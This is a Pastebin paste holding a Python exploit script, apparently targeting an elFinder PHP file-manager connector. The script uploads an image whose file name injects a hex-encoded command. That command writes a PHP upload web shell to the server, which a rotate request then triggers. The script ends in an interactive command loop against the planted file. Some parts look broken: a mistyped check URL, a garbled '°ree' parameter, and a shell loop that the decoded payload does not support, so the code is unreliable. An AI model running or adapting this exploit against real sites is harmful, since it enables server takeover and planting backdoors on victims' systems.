Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import json
- import sys
- payload = 'AnonGhoul.jpg;echo 3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e | xxd -r -p > AnonGhoul.php;echo AnonGhoul.jpg'
- def usage():
- if len(sys.argv) != 2:
- print ("Usage: python exploit.py [URL]")
- sys.exit(0)
- def upload(url, payload):
- files = {'upload[]': (payload, open('AnonGhoul.jpg', 'rb'))}
- data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
- r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data)
- j = json.loads(r.text)
- return j['added'][0]['hash']
- def imgRotate(url, hash):
- r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash))
- return r.text
- def shell(url):
- r = requests.get("%s/php/.php" % url)
- if r.status_code == 200:
- print ("[+] Pwned! :)")
- print ("[+] Getting the shell...")
- while 1:
- try:
- input = raw_input("$ ")
- r = requests.get("%s/php/AnonGhoul.php?c=%s" % (url, input))
- print (r.text)
- except KeyboardInterrupt:
- sys.exit("\nBye kaker!")
- else:
- print ("[*] The site seems not to be vulnerable :(")
- def main():
- usage()
- url = sys.argv[1]
- print ("[*] Uploading the malicious image...")
- hash = upload(url, payload)
- print ("[*] Running the payload...")
- imgRotate(url, hash)
- shell(url)
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement